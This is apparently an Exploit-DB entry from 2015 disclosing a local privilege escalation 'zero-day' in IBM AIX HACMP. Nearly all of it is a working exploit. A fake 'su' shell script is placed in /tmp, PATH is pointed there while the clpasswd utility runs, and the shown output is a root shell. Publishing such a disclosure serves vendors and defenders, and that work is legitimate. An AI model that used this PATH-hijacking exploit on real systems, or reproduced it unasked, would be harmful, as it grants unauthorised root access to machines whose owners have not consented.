IBM AIX High Availability Cluster Multiprocessing (HACMP) – Local Privilege Escalation

  • Author: Kristian Erik Hermansen
    Date: 2015-09-08
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/38106/
  • IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day
    
    Let's kill some more bugs today and force vendor improvement :)
    
    """
    $ cat /tmp/su
    #!/bin/sh
    /bin/sh
    $ chmod +x /tmp/su
    $ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd
    # /usr/bin/whoami
    root
    """
    
    References:
    https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing
    http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm
    
    --
    Kristian Erik Hermansen (@h3rm4ns3c)
    https://www.linkedin.com/in/kristianhermansen
    --